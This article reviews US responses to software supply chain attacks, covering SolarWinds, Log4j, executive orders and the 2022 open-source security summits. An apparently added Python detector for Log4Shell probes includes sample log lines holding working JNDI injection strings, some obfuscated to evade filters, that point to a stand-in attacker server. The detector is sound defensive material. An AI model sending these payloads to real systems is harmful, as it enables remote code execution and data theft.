August 29, 2022 By Mike Elgan 3 min read

Major cyberattacks since 2019 jolted the U.S. government and software industry into action. The succeeding years have seen executive orders, new funding, two summits and a newfound resolve. Because of those attacks, the federal government aims to fix the open-source software security threat altogether. But what has really come of these efforts in the last few years?

The wake-up call

President Joe Biden issued two executive orders last year that bear on cybersecurity: Executive Order 14028, Improving the Nation’s Cybersecurity (May 2021), and Executive Order 14017, America’s Supply Chains (February 2021), which addresses supply chain security.

In the six months leading up to the May 2021 cybersecurity order, the SolarWinds attack, the Microsoft Exchange Server (ProxyLogon) attacks and the Colonial Pipeline ransomware attack were all uncovered.

In December 2020, cybersecurity company FireEye (now Mandiant) revealed a massive and extremely sophisticated supply chain cyber attack launched by a nation-state via the SolarWinds Orion network management system (NMS). SolarWinds was the leading NMS in both business and government. FireEye’s disclosure was unique. They had not discovered the breach through detached research, but by being victimized by it. The subsequent list of victims was enormous.

Russian-government-backed APT29 attackers (also known as Cozy Bear, UNC2452 and Nobelium) compromised SolarWinds’ software build environment, so the malware was inserted during the build rather than into the source code repository, where a review might have caught it. This gave the attackers a foothold in the networks, systems and data of thousands of SolarWinds customers, and the operation has since been described as one of the biggest supply chain attacks in history. Tens of thousands of organizations use the software. To oversimplify how the attack worked: the attackers breached SolarWinds’ networks in September 2019 and the following month began test-injecting code into Orion, the IT performance monitoring product offered by SolarWinds. By February 2020 the Sunburst backdoor was being compiled into Orion builds, and from March 2020 SolarWinds itself shipped digitally signed Orion updates containing the malware, so the customers’ signature checks passed.

The Log4j vulnerability, disclosed in December 2021, also spurred action as a poster child for the risk that open-source dependencies pose to software supply chains. Log4j is a popular Java logging library. The flaw, known as Log4Shell (CVE-2021-44228), is a remote code execution vulnerability: when Log4j logged attacker-controlled text containing a JNDI lookup such as ${jndi:ldap://...}, it would contact the attacker’s server and load code from it. Because user-supplied strings such as HTTP headers are routinely logged, attackers could gain remote access to applications and devices to steal data or deploy ransomware, and further vulnerabilities were found in the initial patches.
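As an added example (not code from the article or from the Log4j project), the following detector applies the JNDI-lookup pattern described above to constructed web-server log lines. It also normalizes the lookup-nesting tricks attackers used to slip past naive string matching, such as ${lower:j}, ${::-j} and ${env:X:-j}, which are real Log4j lookup syntax that evaluates to a single letter. The log lines and IP addresses are constructed for this example.

```python
import re
from typing import List

# Constructed sample access-log lines for this example (not real traffic).
# The first three carry Log4Shell probes in plain and obfuscated forms; the
# last two are benign, and the final one even contains a harmless lookup.
SAMPLE_LINES: List[str] = [
    '198.51.100.20 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.21 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '198.51.100.22 - - "GET /x HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/y}"',
    '198.51.100.23 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.24 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.81"',
]

# ${name:key:-default} and ${::-default} evaluate to "default" when the lookup
# fails; attackers spell "jndi" one letter at a time with these.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# ${lower:X} / ${upper:X} change the case of X.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# What remains after normalization if the line carried a JNDI lookup attempt.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 32) -> str:
    """Resolve innermost lookups repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        before = text
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        if text == before:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines: List[str]) -> List[str]:
    """Return the lines that look like Log4Shell exploitation attempts."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print("ALERT:", hit, "->", normalize(hit))
```

This is a detection heuristic for logs and edge devices, not a fix: the only real remedy is upgrading every copy of Log4j to a patched release, which is exactly why an inventory of open-source components matters. The normalizer handles the common evasions; a determined attacker can nest other lookups, so treat any unexplained `${` in user-controlled fields as worth a look.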

The summits

As a result, the National Security Council called a White House summit in January and a second in May. The initiative brought together more than 90 executives from 37 companies and government leaders in the Open Source Software Security Summit II on May 12. Participating companies included Atlassian, Cisco, Dell, Ericsson, GitHub, Google, IBM, Intel, Microsoft, SAP and others.

The purpose of the meeting, in brief, was threefold:

  • To reduce security vulnerabilities in open-source software
  • To boost the integration of security features into open-source development tools
  • To speed up fixes

In more detail, their goals combined a broad improvement in how open-source software is produced and secured with specific, targeted fixes.

Google Cloud committed during the meeting to the establishment of an Open Source Maintenance Crew. This team of engineers will collaborate with open-source coders to boost security. They also rolled out a new software supply chain dataset available to open-source developers.

At the May gathering, the Linux Foundation and Open Source Security Foundation unveiled a $150 million 10-point plan to improve open-source and supply chain security over the next two years. Other companies unveiled their own initiatives as well.

A long way yet to go

This massive industry effort is making progress, but we still have a long way to go. Some critics complain of inadequate time, money and staff.

By its very nature, the remedy advanced in the Open Source Software Security Summit II is multifaceted, complex, long-term and involves a huge number of players. After all, changing how people build open-source software takes time. Different organizations have different timelines, most of which are works in progress.

SolarWinds itself is revamping all its processes around security and is actively working with its customers to help them improve security.

A recent global survey of 1,000 chief information officers found that 82% say their organizations are still vulnerable to supply chain cyberattacks. However, a solid majority is implementing more security controls, updating review processes and expanding their use of code signing. More than 90% of supply chain-facing software applications use open-source components today.

Ongoing outcomes for an open-source world

In general, the U.S. government and businesses are making some progress. However, it’s too early to make a serious dent in open-source and supply chain vulnerabilities. As the government and the industry evolve to improve open-source security, the bad actors also evolve in response.

There’s room for hope, however. The recent high-profile cyberattacks, two Biden Administration executive orders and two security summits are truly lighting a fire under organizations public and private.

What’s needed now is renewed resolve, more funding and possibly more regulatory or industry action to respond to future attacks. Organizations also need to recognize what problems can leave them vulnerable. Acting fast could prevent the next SolarWinds attack.
